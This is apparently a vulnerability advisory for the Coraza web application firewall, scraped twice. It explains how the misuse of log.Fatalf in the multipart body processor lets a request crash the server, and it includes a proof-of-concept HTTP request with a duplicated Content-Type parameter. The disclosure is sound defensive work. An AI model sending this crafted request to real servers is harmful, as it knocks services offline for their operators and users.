Summary
Due to the misuse of log.Fatalf
, the application using coraza crashed after receiving crafted requests from attackers.
Details
|
mediaType, params, err := mime.ParseMediaType(mimeType) |
|
if err != nil { |
|
log.Fatalf("failed to parse media type: %s", err.Error()) |
|
} |
The bodyprocessors of multipart uses
log.Fatalf
to handle errors from the
mime.ParseMediaType
, but
log.Fatalf
calls
os.Exit
directly after logging the error.
https://github.com/golang/go/blob/a031f4ef83edc132d5f49382bfef491161de2476/src/log/log.go#L288-L291
This means that the application will immediately crash after receiving a malicious request that triggers an error in
mime.ParseMediaType
.
PoC
The server can be demonstrated by https://github.com/corazawaf/coraza/tree/main/examples/http-server
After sending this request
POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: curl/8.1.2
Accept: */*
Content-Length: 199
Content-Type: multipart/form-data; boundary=------------------------5fa6351b877326a1; a=1; a=2
Connection: close
--------------------------5fa6351b877326a1
Content-Disposition: form-data; name="file"; filename="123"
Content-Type: application/octet-stream
123
--------------------------5fa6351b877326a1--
The server will crash immediately. The a=1; a=2
in Content-Type
makes mime: duplicate parameter name
error.
Impact
I believe the vulnerability was introduced by the following commit: 24af0c8.
Mitigation
The error from mime.ParseMediaType
should return directly.
Summary
Due to the misuse of
log.Fatalf
, the application using coraza crashed after receiving crafted requests from attackers.Details
coraza/internal/bodyprocessors/multipart.go
Lines 26 to 29 in 82157f8
The bodyprocessors of multipart uses
log.Fatalf
to handle errors from themime.ParseMediaType
, butlog.Fatalf
callsos.Exit
directly after logging the error.https://github.com/golang/go/blob/a031f4ef83edc132d5f49382bfef491161de2476/src/log/log.go#L288-L291
This means that the application will immediately crash after receiving a malicious request that triggers an error in
mime.ParseMediaType
.PoC
The server can be demonstrated by https://github.com/corazawaf/coraza/tree/main/examples/http-server
After sending this request
The server will crash immediately. The
a=1; a=2
inContent-Type
makesmime: duplicate parameter name
error.Impact
I believe the vulnerability was introduced by the following commit: 24af0c8.
Mitigation
The error from
mime.ParseMediaType
should return directly.